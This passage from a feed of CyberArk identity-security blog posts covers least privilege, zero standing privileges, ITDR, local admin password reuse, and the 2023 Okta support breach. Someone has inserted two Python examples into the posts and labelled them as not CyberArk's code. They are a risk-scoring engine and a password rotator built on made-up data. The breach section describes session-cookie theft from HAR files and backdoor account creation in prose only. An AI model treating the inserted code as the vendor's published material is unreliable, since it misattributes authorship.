  • Users’ web application and cloud services sessions are secured, which is crucial in preventing malware and providing audit trails.

Also worth mentioning: encryption plays a pivotal role in safeguarding data, ensuring that even if unauthorized access occurs, the data remains unreadable.

Privilege and Machines: Protecting Non-human Identities

In the context of data privacy, privilege isn’t limited to human users alone – especially at a time when machine identities outnumber human identities by 45:1. Non-human entities like servers, applications and automated processes also require identities and privileges.

It’s essential to align these non-human identities with PoLP to limit access to only what’s necessary. Furthermore, the authentication of machines must be fortified to prevent misuse or compromise. Secrets management and credential rotation are as critical for non-human identities as they are for humans, and organizations look to secure them without compromising agility and development workflows.

Here are a few best practices to apply:

  • Integrate secrets management with existing tools and applications to simplify secrets management.
  • Centralize secrets management and reduce secrets sprawl.
  • Automate security functions to improve operational efficiency.
  • Provide easy-to-use options for developers.

Reporting and Audit: Ensuring Compliance

Complying with data privacy regulations requires meticulous reporting and auditing processes. Organizations must provide specific insights into their data security practices and demonstrate adherence to best practices. In this context, data sovereignty becomes increasingly relevant as regulators and organizations work to maximize ownership and control of data.

The problem is that economic pressures such as staffing and resource gaps make it hard for security teams to keep up with audit and reporting demands.

This exemplifies how automation can help – and why it’s essential. The work associated with compliance will only increase; if teams aren’t growing in parallel, you need efficiencies that can help you scale up to audit requirements. Automated access certification processes and ensuring a constant review of existing entitlements can help remove time-consuming manual tasks from the equation.

A Zero Trust approach is standard practice for compliance across industries. This means working under the assumption that all users and devices are implicitly untrusted and must be authenticated, authorized and continuously validated regardless of location or network.

Many directives and guidelines reflect Zero Trust principles; in conversations with auditors, it’s essential to show which identities have access to what resources and demonstrate what controls you have in place to secure it all.

High-Risk Access in the Cloud and Zero Standing Privilege

Cloud environments are complex, and the sheer number of servers and accounts makes it easy to overlook security configurations, which makes robust identity security controls in the cloud crucial. As a result, misconfiguration of cloud access is a common pitfall for organizations’ security. Recent data breaches have highlighted the importance of proper cloud access management. Many incidents result from simple misconfigurations rather than sophisticated cyberattacks.

But there’s hope. Pursuing zero standing privileges (ZSP) can significantly reduce the risk of identity compromise and credential theft and misuse. By limiting access to only what is necessary for a specific task and reducing standing privileges to the minimum, ZSP enhances data security and privacy.

For organizations developing their own cloud-based software offerings in particular, implementing least privilege and ZSP principles can help meet requirements for data privacy regulations and earn SOC 2 or ISO 27001 certifications. These certifications also accelerate growth opportunities by building trust and credibility with consumers.

While zero standing privilege (ZSP) is often associated with privileged access, a growing discussion exists about extending its application to data consumers across departments, such as HR, sales and finance. Ensuring all users operate under PoLP is a proactive step toward bolstering data security and compliance.

Protecting Data in Today’s Threat Landscape

Data privacy and security remain critical for organizations and the stakes are higher than ever. With regulations and frameworks increasing, the rising value of data and the integration of data-driven technologies all demand a proactive approach to identity security. Organizations must prioritize robust identity security controls and hygiene, implement ZSP and stay abreast of evolving compliance requirements to safeguard their most valuable asset: data. By doing so, they can mitigate risks, protect customer trust, and thrive in a world where data is the new currency.

Lilach Faerman Koren is a product marketing manager at CyberArk.

Building Secure and Compliant SaaS Apps – Identity Security Best Practices https://www.cyberark.com/blog/building-secure-and-compliant-saas-apps-identity-security-best-practices/ Fri, 03 Nov 2023 15:29:59 +0000 https://www.cyberark.com/?p=184076

Do you need to secure high-risk access to the back end of your customer-facing apps? Yes, you do – assuming you care about cybersecurity risk, uptime or compliance with SOC II and NIST, and with the AWS, Azure and GCP architecture frameworks.

To meet compliance requirements and grow your business, you must properly secure access to the cloud services and workloads powering your SaaS app. No matter the size and scale of your cloud-hosted app, addressing identity security-related compliance requirements is a necessary step to grow your business – especially when working with customers in highly regulated industries.

Sensitive data is sensitive data. Auditors assessing compliance with SOC II, NIST and other compliance standards don’t care if organizations are lifting and shifting apps to VM workloads or building on containers and serverless functions. Auditors don’t care which cloud providers a dev team uses to build their apps. And auditors definitely don’t care about the cool microservices architectures, design assessments and sprint deadlines top of mind for your engineering teams.

Auditors only care that companies properly secure all identities accessing sensitive data in their applications.

Here’s the good news: several identity security and privileged access management (PAM) best practices can help organizations reduce risk and build SaaS apps that comply with SOC II, NIST and other standards.

The following are several of these proven best practices.

Implement Least Privilege

Compliance frameworks require organizations to adhere to the principle of least privilege (PoLP), a foundational cybersecurity concept. Frameworks differ in their terminology – SOC II has requirements for “logical access control,” for example, while the NIST Cybersecurity Framework explicitly uses the term “least privilege.” But make no mistake – to build compliant SaaS applications, organizations need to ensure all identities have the minimum necessary entitlements to perform their duties.

Organizations must, in the words of the AWS Well-Architected Framework, “Implement the principle of least privilege and enforce separation of duties with appropriate authorization for each interaction with your AWS resources.”

Identity security programs can meet these requirements by:

  • Removing local administrator rights on developer endpoints, reducing the risk of credential theft.
  • Onboarding local admin credentials to PAM solutions for automatic rotation and role-based access control, further reducing the risk of stolen credentials.
  • Reducing excessive permissions in multi-cloud environments with Cloud Infrastructure Entitlements Management (CIEM). CIEM is emerging as a core element of PAM programs that reduces the risk of lateral movement. This includes reviewing cloud IAM roles and removing excessive access to protected information assets and services.

Aim for Zero Standing Privileges (ZSP) With All Operational Access

Once least privilege is in place, organizations must secure privileged access. To meet compliance, many organizations are embracing the emerging security philosophy of zero standing privileges (ZSP). This security principle’s methodologies build on the foundation of least privilege by elevating access just-in-time and minimizing the use of long-lived passwords and credentials to access cloud workloads and services.

Leading cloud service providers recommend using federated access models – not shared accounts – for access to workloads and services. Developers, site reliability engineers and data scientists are able to assume IAM roles without the use of standing credentials. As a result, most developer access can be considered operational; cloud users do not need persistent access to resources, they only need them for specific tasks.

Organizations can satisfy audit and compliance requirements for this operational access by embracing a ZSP approach. Key elements of ZSP include:

  • Elevating console and CLI access to cloud services on a just-in-time basis, using roles scoped with the minimum necessary permissions for the task at hand. Examples include accessing CSP services to change networking, database and compute auto-scaling configurations.
  • Elevating access to workloads running on the cloud on a just-in-time basis. Examples include operational access to Linux and Windows VMs for lift-and-shift apps, or Kubernetes and other containers for apps running cloud-native, microservices architectures.
  • Integrating access request workflows with existing developer tools to avoid slowing velocity. Developers often need to request additional access to solve issues during outages or critical situations (aka critsits). Making it easy – and fully auditable – is essential for compliance.

Securely Manage and Rotate Credentials Used for Standing Access – Including Application Secrets

Even in the cloud, some long-lived, system-level access is inevitable. Common examples include the root and registration accounts required to establish a cloud footprint, DevOps secrets used by applications, service accounts and other machine identities – and administrative accounts for lift-and-shift software workloads running inside VMs, such as admin accounts for ERP, database or security systems.

Security and compliance strategies must account for the heightened risk these long-lived, system-level accounts represent. Long-established approaches to PAM and secrets management can help. Examples include:

  • Discovering credentials used by administrators, service accounts and other identities and onboarding them to a PAM solution. This reduces the risk of credential theft.
  • Centrally managing secrets used by developers, including through integration with CSP native secret stores. This approach to secrets management enables developers to use their preferred tools while enabling credential management and rotation that meets compliance objectives.
  • Automatically rotating credentials at intervals aligned with organizational policy (which are often specified in compliance frameworks).
  • Logging all usage of privileged accounts to deter insider threats. To maximize audit efficiency, centrally store audit trails for both sessions using shared privileged accounts and sessions using federated access with zero standing privileges.
  • Isolating usage of these accounts to prevent ransomware and other malware from reaching VMs and other cloud workloads.

Extend Identity Security to Your Third-Party Vendors

Internal employees aren’t the only human identities with access to the backend of your SaaS apps. Many organizations leverage remote, third-party vendors and contractors to set up or run the cloud workloads and services powering their apps.

Auditors assessing compliance with leading cybersecurity frameworks often zero in on this access. SOC II compliance in particular relies on specific requirements to manage remote access and all points of access to data. Organizations can demonstrate compliance with these requirements with familiar strategies. Examples include:

  • Managing all points of remote access to data – for both internal and external identities like contract developers, IT contractors and other third-party vendors.
  • Removing any standing privileged access for third parties to cloud workloads and services. Excessive third-party access has been linked to several data breaches of cloud environments in recent years.
  • Enforcing strong, biometric authentication on third-party access to the back end of SaaS apps.

Apply Strong Authentication and Monitoring for Defense-in-Depth

Access control is a powerful way to reduce risk. But embracing the Zero Trust paradigm requires organizations to ‘never trust’ and ‘always verify’ access to their cloud environment.

This same Zero Trust philosophy can provide additional value to organizations as they strive to build secure, compliant applications. To strengthen compliance with SOC II and other frameworks, organizations should consider additional defense-in-depth controls such as:

  • Enforcing strong, adaptive multi-factor authentication (MFA) and identity threat detection on all attempts to access the back end of SaaS apps. This should include authenticating third-party identities and applying controls like step-up and continuous authentication.
  • Ensuring all machine-to-machine connections are authenticated.
  • Monitoring all high-risk sessions to workloads and services, with full audit trails. To maximize insight, screen recording and video playback can help auditors and forensics teams streamline their tasks.
  • Systematically reviewing and certifying access, removing entitlements to ensure access permissions align with job roles and responsibilities.
  • Implementing capabilities to ensure prompt response to misuse of privileged accounts or any high-risk access.

These identity security best practices can strengthen your compliance initiatives. To learn more about building compliant SaaS apps, check out our whitepaper, “2024 Playbook: Identity Security and Cloud Compliance.”

Sam Flaster is a director of product marketing at CyberArk.

Why ITDR Matters for Your Enterprise’s Identity Security https://www.cyberark.com/blog/why-itdr-matters-for-your-enterprises-identity-security/ Tue, 31 Oct 2023 19:03:03 +0000 https://www.cyberark.com/?p=183851

You may not recognize the term Identity Threat Detection and Response (ITDR), but this emerging security discipline aims to address an all-too-familiar challenge: managing and securing the massive number of identities – human and machine – across the enterprise.

What is ITDR?

To understand ITDR, it’s helpful to first define what ITDR is not. ITDR isn’t a silver-bullet cybersecurity solution that offers complete identity protection from security breaches; there is no such thing. It isn’t a group of identity and access management (IAM) prevention controls. ITDR coverage isn’t limited to a specific area such as the endpoint, nor is ITDR meant to detect a broad swath of cyber threats.

Instead, ITDR is a system of structured processes, cross-functional team collaboration and threat intelligence and behavior analysis tools working in concert to protect the identity infrastructure itself. ITDR adds a defense-in-depth layer to preventive identity security defenses – such as privileged access management (PAM), multi-factor authentication (MFA) and identity governance and administration (IGA) – to rapidly remediate identity-centric attacks. ITDR supports Zero Trust by employing detection and response mechanisms to identify potential threats, examine any suspicious activity during and after the authentication and authorization process and take the appropriate countermeasures through security orchestration and response.

Graphic illustrating what ITDR is.

Why Does ITDR Matter?

In this ITDR crash course, you’ll explore eight adoption drivers that demonstrate why ITDR matters and how it fits into the broader cybersecurity picture.

  • If you can’t trust the identity or identity source, you can’t trust any security control. Threats that target identity infrastructures can compromise an entire environment – underscoring the need for ITDR. Similarly, the infamous SolarWinds software supply chain breach showed that if an attacker can successfully infiltrate systems with privileged access to high-value systems and data, they could potentially impersonate any human or machine identity, pass any authentication/authorization challenge and other entitlement controls and rapidly escalate privileges to reach their goal. To counter these sophisticated threats, organizations must implement strong controls to block and contain attacks from the start. But assuming that your environment has already been breached also means adopting ways to rapidly identify and analyze post-authentication red flags, then take appropriate countermeasures to safeguard the trustworthiness of the identity infrastructure through security orchestration and response.
  • Identities are everywhere. IT security professionals understand that stolen, abused or misused identities – whether privileged or not – are a gateway to sensitive information. According to the CyberArk 2023 Identity Security Threat Landscape report, nearly all IT security professionals (99%) anticipate an identity-related compromise this year. Unaddressed identity risks due to economic slowdown, an expected 240% growth in human and machine identities, increased cloud migration and accelerating attacker innovation are all contributing factors.
  • In the security operations center (SOC), most threat detection tools monitor a broader scope to cover many use cases. HelpNetSecurity reports that on any given day, the SOC team receives about 4,484 threat alerts from these systems and spends nearly three hours on manual triage. Overwhelmed by false positives coming from disjointed tools, 97% of SOC analysts worry about missing a relevant security event. According to the 2023 Verizon DBIR, 74% of security breaches involve the human element (i.e., social engineering attacks, errors and misuse), so there’s a good chance those missed events tie back to identity. Unlike most SOC tools, identity-based threat detection tools specifically aim to protect the identity infrastructure to maintain the trust of the identity database.
  • Individual user access control often ends after the authentication/authorization process. Most of today’s threat detection and response tools focus on very specific threats. For example, EDR tools focus on the endpoint and lack visibility and control beyond it (e.g., cloud-based applications and infrastructure and local datacenters are not under EDR coverage). Controlling and monitoring user access to different environments requires a more centralized and granular solution that focuses on the identity infrastructure. With this approach, organizations can continue to monitor the user session – regardless of the environment – after the authentication and authorization process. This allows them to respond to threats quickly and reduce possible breaches of identity infrastructure.
  • Identity security isn’t linear. Since identity is the perimeter, a security continuum – not a straight line – is the only way to continuously track trust. With ITDR, policy-based threat prevention, detection and response exist in a continuous feedback loop, constantly learning from – and acting upon – identity threat insights. A centralized threat analysis engine automatically detects anomalous behavior that, on its own or in combination with privileged access misuse, could be a potential threat, along with risky access to both business applications and privileged accounts. The engine also tracks the entire chain of events leading up to these suspicious actions to streamline investigations and create clear audit trails.
  • Innovation can’t wait. Adaptive authentication and continuous threat monitoring mechanisms look at user behavior history and context to discern typical activities from risky ones. When they detect risky behavior (e.g., connection via a new IP address or OS, multiple failed logins or suspected credential theft), they can automatically move the user into a “risky user group,” update the MFA policy in real time (e.g., requiring more difficult factors like number-matching challenges) and temporarily limit or revoke access. Meanwhile, actionable identity-based analytics strengthen the broader cybersecurity product stack and deepen the enterprise’s overall threat intelligence capability.
  • Teamwork makes the dream work. Preventing attacks requires skilled security analysts with specialized knowledge, and cloud adds another layer of complexity. But cybersecurity shortages make this difficult: more than four out of five companies say they have fewer than five security analysts or don’t have enough analysts to run the SOC, reveals a Censuswide study. Under-staffed SOC teams are forced to act broadly, making rapid decisions based on experience and information at hand. These professionals aren’t deeply entrenched in identity and access management (IAM), which is usually a separate function in the organization. ITDR challenges this siloed model by synchronizing identity data and unifying cross-functional security teams to expand the SOC. This isn’t a shift that happens overnight, but organizations that prioritize it can dramatically enhance identity protection and bridge knowledge gaps, while creating a centralized, end-to-end threat detection and response flow in the closest real-time way possible.
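The adaptive-authentication loop described in the “Innovation can’t wait” driver above (behavior history and context producing a risk decision, a “risky user group” and a real-time MFA policy change), as an added example that is not CyberArk’s code: per-user baselines of seen IPs and operating systems plus a sliding window of failed logins are scored, and the score drives allow, step-up or block. The signal weights, thresholds, event fields and sample events are all constructed assumptions.

```python
"""Added example (not CyberArk's code) of the adaptive-authentication loop described above:
per-user baselines of seen IPs and OSes plus a failed-login window produce a risk score that
moves the user into a risky group, steps up MFA or blocks. Weights and thresholds are assumptions."""
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Deque, Dict, List, Set

FAIL_WINDOW_SEC = 300            # failures older than this no longer count toward a burst
FAIL_THRESHOLD = 3
WEIGHTS = {"new_ip": 30, "new_os": 20, "failed_burst": 50}
STEP_UP_AT = 30                  # score at which MFA is stepped up and the user becomes 'risky'
BLOCK_AT = 70                    # score at which access is temporarily revoked


@dataclass
class AuthEvent:
    ts: int          # epoch seconds
    user: str
    ip: str
    os: str
    success: bool    # did the primary credential check pass?


class RiskEngine:
    def __init__(self) -> None:
        self.seen_ips: Dict[str, Set[str]] = defaultdict(set)
        self.seen_os: Dict[str, Set[str]] = defaultdict(set)
        self.failures: Dict[str, Deque[int]] = defaultdict(deque)
        self.risky_group: Set[str] = set()

    def evaluate(self, ev: AuthEvent) -> dict:
        signals: List[str] = []
        # Context signals: only meaningful once the user has a baseline
        if self.seen_ips[ev.user] and ev.ip not in self.seen_ips[ev.user]:
            signals.append("new_ip")
        if self.seen_os[ev.user] and ev.os not in self.seen_os[ev.user]:
            signals.append("new_os")
        # Behavioural signal: failed logins inside a sliding window
        window = self.failures[ev.user]
        if not ev.success:
            window.append(ev.ts)
        while window and ev.ts - window[0] > FAIL_WINDOW_SEC:
            window.popleft()
        if len(window) >= FAIL_THRESHOLD:
            signals.append("failed_burst")

        score = sum(WEIGHTS[s] for s in signals)
        if score >= STEP_UP_AT:
            self.risky_group.add(ev.user)       # policy update persists beyond this event
        if score >= BLOCK_AT:
            action = "block"
        elif ev.user in self.risky_group:
            action = "step_up_mfa"              # risky users keep stronger factors until an analyst clears them
        else:
            action = "allow"
        # Learn the baseline only from clean, successful logins so unfamiliar context
        # is not adopted as 'normal' (real deployments also learn after a passed step-up)
        if ev.success and action == "allow":
            self.seen_ips[ev.user].add(ev.ip)
            self.seen_os[ev.user].add(ev.os)
        return {"user": ev.user, "score": score, "signals": signals, "action": action}


def run_demo() -> List[dict]:
    """Constructed event sequence: a normal baseline, then a burst of failed logins from
    unfamiliar context, then the real user returning from the usual device."""
    events = [
        AuthEvent(0,   "alice", "10.0.0.5",    "Windows", True),
        AuthEvent(60,  "alice", "10.0.0.5",    "Windows", True),
        AuthEvent(120, "alice", "203.0.113.9", "Linux",   False),
        AuthEvent(130, "alice", "203.0.113.9", "Linux",   False),
        AuthEvent(140, "alice", "203.0.113.9", "Linux",   False),
        AuthEvent(500, "alice", "10.0.0.5",    "Windows", True),
    ]
    engine = RiskEngine()
    return [engine.evaluate(ev) for ev in events]


if __name__ == "__main__":
    for result in run_demo():
        print(result)
```

Note that the last event carries no signals at all, yet still gets a step-up: the risky-group membership is the persisted policy change the text describes, not a per-event score.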

ITDR Supports Zero Trust and Enhances Cyber Resilience

Changes in the digital environment have upended conventional thinking and positioned identity in cybersecurity’s center. And recent attacks on identity infrastructure underscore the need for a Zero Trust model involving least privilege enforcement and continuous threat detection for every identity across its lifecycle. This is the only way to truly ensure that only the right users access only the right resources at only the right times and for only the right reasons.

ITDR supports Zero Trust by continuously monitoring threats and automatically responding to attacks to help businesses keep their identity infrastructures secure. Now is the time to dig deeper into this critical security discipline and discover the benefits of implementing ITDR as part of a holistic identity security approach.

Claudio Neiva is CyberArk’s Field Technology Director (LATAM), PAM and Identity Security. For best practices and advice to help you plan your Zero Trust approach within your organization, check out Neiva’s new whitepaper, “Guiding Your Leadership Team Through the Zero Trust Mindset.”

Skeleton Keys and Local Admin Passwords: A Cautionary Tale https://www.cyberark.com/blog/skeleton-keys-and-local-admin-passwords-a-cautionary-tale/ Thu, 26 Oct 2023 17:59:23 +0000 https://www.cyberark.com/?p=183739

Picture yourself immersed in your favorite mystery novel, eagerly flipping through the pages as the suspense thickens. You’re enthralled, engrossed in the story of a hotel burglar with an uncanny ability to sneak into guest rooms without leaving telltale signs of break-ins or lock-picking.

As you read on, you’re captivated – and stumped – by how this elusive bad actor can deftly close the doors behind them, leaving no clues. The enigma builds and ultimately is paid off with a thrilling finale when the secret is revealed: a singular, powerful tool called a “skeleton key.”

Unlike regular keys unique to a specific lock, a skeleton key has a shape that enables it to work in multiple locks by manipulating their internal mechanisms. It’s like a universal access pass, granting effortless entry without requiring individual keys for each lock. This makes it a versatile tool, ideal for someone looking to navigate and access various spaces easily. Skeleton keys are still widely used – you more likely know them as “master keys” or “arrow keys.”

Just like in our favorite detective novels, bad actors use master keys to access things like mailboxes, luggage, apartments, hotel rooms and even to pull off bank heists.

Skeleton keys embody a trade-off between security and convenience that today’s security teams are intimately familiar with.

  • Pros: On one hand, they offer unparalleled convenience, enabling swift access to many locks with a single tool. This efficiency appeals to those who routinely need to navigate spaces without carrying a massive key ring.
  • Cons: However, this convenience comes at the cost of security. The universal nature of the skeleton key means that if it falls into the wrong hands, it poses a significant security risk, potentially granting unauthorized access to areas and compromising the safety measures that locks are meant to provide.

And, of course, there’s a digital version of these keys used for cybercrime.

Skeleton Keys in the Digital Era: From Bad to Worse

In the digital era, the scale and ease with which a skeleton key equivalent can compromise security have reached unprecedented heights.

Picture vast organizations with tens of thousands of endpoints: workstations and servers, both physical and virtual, scattered across offices, on-premises data centers and cloud environments. It’s not uncommon to encounter a troubling practice where system administration is built around the routine use of local admin accounts, often with the same password – mirroring the concept of a universal skeleton key. Although advantageous for management, this simplistic approach results in a colossal vulnerability – a true Achilles’ heel (!) – akin to granting unrestricted access to an entire hotel’s secret passages and rooms through a single master key.

The implications are profound, and the stakes for IT security have never been higher.

In today’s complex enterprise landscape, the prevalent use of what can be termed “modern digital skeleton keys” – local administrator accounts – poses a significant risk to organizational cybersecurity. Virtually every endpoint within a system is equipped with at least one of these local admin accounts, presenting a potential gateway for unauthorized access.

Compounding this risk, these local accounts cannot be protected with strong authentication, leaving them vulnerable to relatively easy exploitation. Adding to the concern, security teams can’t employ multi-factor authentication (MFA) to help protect these accounts. That’s because strong authentication and MFA require a source of truth and controls to prevent attackers from cracking or bypassing them.

Local authentication, however, is by definition its own authority and is usually constrained by legacy requirements. For instance, Windows is still using NTLM for local authentication. Also, the lack of an out-of-the-box method for centralized management leaves organizations grappling with scattered and unmonitored access points. Together, these gaps further underscore the urgent need for a comprehensive and secure approach to endpoint privilege management (EPM) and endpoint privilege security (EPS).

Let’s pause here to note that this is the actual state that too many companies are in right now. For these organizations, everything you read next – even the basic mitigations outlined in the next paragraph – is, at best, a part of future cybersecurity strategy, which is a humbling realization about where we are as defenders.

Unpause.

Strategic Steps and Security Controls to Help Reduce Risk

The following are some steps your team can take to help mitigate the risk of local privileged account misuse:

  1. Eliminate the practice of reusing passwords for local admin accounts. Don’t create the “skeleton key” for your entire endpoint infrastructure in the first place! Each local account on every endpoint MUST have a unique password.
  2. Closely monitor local admin account usage. Yes, we understand this can be tricky. Who is the “local administrator” anyway? The answer is in itself a whodunit: Is it someone from IT? Is it the end user? Is it someone who got the password and is already in a system on your network? The simple answer is that it’s whoever currently has the password, and that’s a big part of why every organization needs to have a solid identity security component in their cybersecurity strategy.
  3. Rotate the passwords to local admin accounts frequently, and especially rotate them after each use. This is very important because cyberattackers can use different techniques to compromise the password while it is being used (e.g., a keylogger or a camera).

These mitigations are somewhat straightforward, but I must caution you against using half-baked solutions. There are many ways to get this wrong. When selecting a solution, ensuring it gets the basics right regarding controls and capabilities is essential.

Here are some examples:

  • Management of all privileged accounts on the endpoint, not just the built-in local administrator account
  • Encrypted and secure storage of passwords
  • Assured custody of the next, current and previous passwords
  • Reliable communication with the service and transaction-based password rotation
  • Support for major operating systems, workload types and deployment types
  • Continuous discovery of local privileged accounts and their transition under the password rotation policy umbrella
  • Robust deployment and recovery workflows
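The three steps above (one unique password per endpoint, monitored use, rotation after each use) and the checklist items on custody of the next, current and previous passwords and transaction-based rotation, as an added example that is not CyberArk’s code: a vault record per endpoint, a two-phase rotation that only commits after the endpoint confirms the change, a reconcile step for interrupted rotations, and a check for the “skeleton key” condition of one password shared across hosts. `EndpointSimulator` is a hypothetical stand-in for a real endpoint’s password-change interface, and the fleet and passwords are constructed.

```python
"""Added example (not CyberArk's code) of the controls listed above: one unique password per
endpoint, transaction-based rotation, and assured custody of the previous/current/next values.
EndpointSimulator is a hypothetical stand-in for the real endpoint's password-change API."""
import secrets
import string
from dataclasses import dataclass
from typing import Dict, List, Optional

ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*-_=+"


def generate_password(length: int = 24) -> str:
    """CSPRNG-generated password; never derived from the hostname or a shared seed."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


@dataclass
class Custody:
    """Vault record for one endpoint's local admin account."""
    previous: Optional[str] = None  # last known-good value, kept for recovery
    current: Optional[str] = None   # value the endpoint is believed to accept now
    next: Optional[str] = None      # staged value; non-None only while a rotation is open


class EndpointSimulator:
    """Hypothetical endpoint that changes its password only when 'old' is correct."""

    def __init__(self, hostname: str, password: str, reachable: bool = True):
        self.hostname = hostname
        self.reachable = reachable
        self._password = password

    def change_password(self, old: str, new: str) -> bool:
        if not self.reachable:
            raise ConnectionError(f"{self.hostname} unreachable")
        if old != self._password:
            return False
        self._password = new
        return True

    def verify(self, password: str) -> bool:
        return password == self._password


class Rotator:
    def __init__(self) -> None:
        self.vault: Dict[str, Custody] = {}

    def onboard(self, endpoint: EndpointSimulator, password: str) -> None:
        """Bring an existing local admin account under management with its known password."""
        self.vault[endpoint.hostname] = Custody(current=password)

    def rotate(self, endpoint: EndpointSimulator) -> bool:
        """Two-phase rotation: stage 'next' in the vault, change it on the endpoint, then commit.
        If anything fails between the phases, both candidates stay in custody for reconcile()."""
        rec = self.vault[endpoint.hostname]
        if rec.next is None:                      # reuse the staged value if this is a retry
            rec.next = generate_password()
        try:
            changed = endpoint.change_password(rec.current, rec.next)
        except ConnectionError:
            return False                          # transaction stays open
        if not changed:
            return False
        rec.previous, rec.current, rec.next = rec.current, rec.next, None   # commit
        return True

    def reconcile(self, endpoint: EndpointSimulator) -> str:
        """After an interrupted rotation, learn which staged value the endpoint actually holds."""
        rec = self.vault[endpoint.hostname]
        if rec.next is None:
            return "clean"
        if endpoint.verify(rec.next):             # change landed but the commit was lost
            rec.previous, rec.current, rec.next = rec.current, rec.next, None
            return "committed"
        if endpoint.verify(rec.current):          # change never landed; discard the staged value
            rec.next = None
            return "rolled_back"
        return "lost"                             # neither value works: hand off to recovery workflow

    def shared_passwords(self) -> Dict[str, List[str]]:
        """Find 'skeleton keys': one current password in use on more than one endpoint."""
        by_value: Dict[str, List[str]] = {}
        for host, rec in self.vault.items():
            by_value.setdefault(rec.current or "", []).append(host)
        return {pw: hosts for pw, hosts in by_value.items() if len(hosts) > 1}


if __name__ == "__main__":
    # Constructed fleet: three endpoints onboarded with the same reused local admin password
    rot = Rotator()
    fleet = [EndpointSimulator(h, "Shared-Admin-2023!") for h in ("ws01", "ws02", "srv01")]
    for ep in fleet:
        rot.onboard(ep, "Shared-Admin-2023!")
    print("hosts sharing a password before rotation:", list(rot.shared_passwords().values()))
    for ep in fleet:
        print(ep.hostname, "rotated:", rot.rotate(ep))
    print("hosts sharing a password after rotation:", list(rot.shared_passwords().values()))
```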

Reusing local administrator account passwords is a double-edged sword within today’s enterprise framework. The inherent risk lies in their omnipresence across endpoints and the inability to deploy authentication measures like adaptive MFA. This exposes organizations to potential security breaches, highlighting the critical importance of proactive measures.

Implementing rigorous security protocols, including regular monitoring and auditing of these accounts, enforcing strong password policies and segregating privileges to limit excessive access, forms the cornerstone of effective mitigation. However, this needs to be done in a way that increases the security and reliability of the infrastructure.

Out with Skeleton Keys, in with Endpoint Privilege Security

It’s time to rewrite the narrative to match this evolving digital landscape and banish skeleton keys from news headlines. The constant portrayal of cybersecurity breaches and vulnerabilities stemming from unsecured local admin accounts is a predictable plotline.

Addressing the local admin account password challenge requires a powerful and reliable solution. Organizations can mitigate this persistent risk by applying endpoint security controls for loosely connected devices.

When considering a solution, critical capabilities should include automated local privileged account discovery and enforcement of password rotation based on policies. This approach delivers security reinforcement even when endpoints have limited internet connectivity.

Organizations can streamline operational efficiency by focusing on loosely connected devices and heightening security, fundamentally transforming how they manage and safeguard endpoints. In doing so, organizations can get the best of both worlds – a positive security outcome because every endpoint now has a unique password that has never been used before (read: not compromised, guaranteed) and convenience, because even though a skeleton key for your endpoints doesn’t exist, your administrators have a simple and secure way of authenticating to any endpoint.

Author’s note: After you’ve finished reading that mystery novel, check out how CyberArk Endpoint Privilege Manager and CyberArk Privilege Cloud can help drive security and convenience outcomes, with a new and innovative focus on loosely connected devices and automated local privileged account discovery.

Andrey Pozhogin is a senior product marketing manager at CyberArk.

Piecing Together the Attack on Okta’s Support Unit https://www.cyberark.com/blog/piecing-together-the-attack-on-oktas-support-unit/ Tue, 24 Oct 2023 22:01:56 +0000 https://www.cyberark.com/?p=183697

Update, Nov. 30, 2023: On Nov. 29, Okta revealed that the October Okta breach we wrote about in the following blog was more extensive than initially reported. Okta has now revealed that a threat actor ran and downloaded a report containing the names and email addresses of all Okta customer support system users. This impacts all Okta Workforce Identity Cloud (WIC) and Customer Identity Solution (CIS) customers, excluding those in FedRAMP High and DoD IL4 environments. This contrasts with Okta’s earlier statement that less than 1% of its 18,000-plus global customers were affected. Okta clarified that while there is no direct evidence of active exploitation, the stolen information, including names and email addresses, poses a risk for potential phishing or social engineering attacks targeting Okta customers. The company did not attribute the attack to a specific group and acknowledged the uncertainty surrounding the perpetrators. This update further illustrates the need for all organizations, especially administrators, to enhance their identity security by implementing adaptive multi-factor authentication (MFA) and considering phishing-resistant authenticators.

____

The October 2023 Okta breach is the latest example in a long line of third-party identity attacks. Based on reports to date, it seems that the attack on Okta’s support case management system enabled a threat actor to launch downstream attacks into other companies. So far, 1Password, BeyondTrust and Cloudflare have publicly confirmed they were targeted.

Such attacks don’t discriminate and pointing fingers is unproductive. However, there are opportunities to learn and share to help improve our collective cyber preparedness – and prevent history from repeating itself. We join the unfolding conversation in this spirit.

Okta Breach Timeline and Flow: What We Know So Far

Graphic detailing the Okta breach flow.

The following is an overview of the Okta breach, along with some observations and speculations based on early reports.

•  Initial infection (date unknown): Exactly when and how the attacker initially compromised Okta’s support system remains unknown. Possibilities include, but aren’t limited to, password re-use from previous data dumps combined with a lack of multi-factor authentication (MFA), cookie theft from a compromised endpoint, phishing and MFA bypass, social engineering, keylogging, or improper access to the portal through an unmanaged endpoint.

The attacker’s reported movements suggest that they may have identified a specific Okta engineer, stolen their credentials (via spear-phishing or another social engineering tactic) and infected their endpoint machine with command and control (C&C) tools such as Cobalt Strike or BruteRatel, which are used by pen testers, red teamers and threat actors alike. This would allow them to actively monitor the endpoint, exfiltrate data at will and use the stolen credentials to access Okta’s support system.

•  September 29: 1Password, an Okta customer, detected suspicious activity on its Okta instance used to manage its employee-facing apps. According to reports, a member of the 1Password IT team opened a support case with Okta and provided a HAR file (short for HTTP archive – a type of file used for recording web browser data for support and troubleshooting services) created from the Chrome dev tools. An investigation confirmed that an attacker had accessed the Okta tenant with administrative privileges.

•  October 2: BeyondTrust, another Okta customer, detected an issue involving one of its internal Okta admin accounts and immediately notified Okta.

Later in the month, the customer publicly disclosed more attack details. One of its employees was experiencing ongoing technical issues with the Okta system and, at the request of Okta support, uploaded a HAR file for troubleshooting purposes. Not only did this HAR file contain browsing data, it also contained a valid Okta session token (or cookie). Attackers target cookies as they enable users – and threat actors – to skip over login and MFA prompts.

Just 30 minutes after the Okta support engineer downloaded the HAR file to their infected machine, an attacker – who used an unfamiliar IP address in Malaysia linked to anonymizing proxy/VPN services – extracted session tokens/cookies from the HAR file to access the Okta customer’s network.

The attacker also tried using a cookie to access the client’s Okta console and create an admin account. After failing, they used the cookie again to hijack and replay the browser session to impersonate the user. Notably, the attacker created a backdoor user account in the company’s typical naming convention to help it blend in with existing accounts. Attackers often use backdoor accounts like this to maintain persistence and avoid detection, move laterally to gain control of the victim organization’s network then escalate access privileges to reach their goal. Fortunately, in this case, the customer detected and blocked the attack quickly.

•  October 18: A third organization, Cloudflare, investigated and reported a similar incident to Okta. Through early detection and immediate response, no customer information or systems were impacted in this particular event.

